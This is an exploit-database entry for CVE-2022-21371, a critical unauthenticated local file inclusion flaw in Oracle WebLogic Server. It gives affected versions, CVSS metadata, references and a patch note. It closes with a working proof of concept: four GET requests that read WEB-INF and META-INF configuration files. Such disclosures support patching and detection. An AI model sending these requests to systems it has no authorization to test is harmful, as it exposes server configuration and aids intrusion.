Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion

vendor:

Oracle WebLogic Server

by:

Jonah Tan

9.8

CVSS

CRITICAL

Local File Inclusion

CWE

Product Name: Oracle WebLogic Server

Affected Version From: 12.1.3.0.0

Affected Version To: 14.1.1.0.0

Patch Exists: YES

Related CWE: CVE-2022-21371

CPE: a:oracle:weblogic_server

Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2022-21371/

Other Scripts:

Tags: cve,cve2022,lfi,weblogic,oracle,packetstorm

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://www.oracle.com/security-alerts/cpujan2022.html, https://nvd.nist.gov/vuln/detail/CVE-2022-21371, https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786, http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html

Nuclei Metadata: {'max-request': 2, 'vendor': 'oracle', 'product': 'weblogic_server'}

Platforms Tested: Windows Server 2019

2022

Oracle WebLogic Server 14.1.1.0.0 – Local File Inclusion

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.

Mitigation:

Apply the latest patches from Oracle and ensure that the WebLogic server is configured securely.

Source

Exploit-DB raw data:

# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.

# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml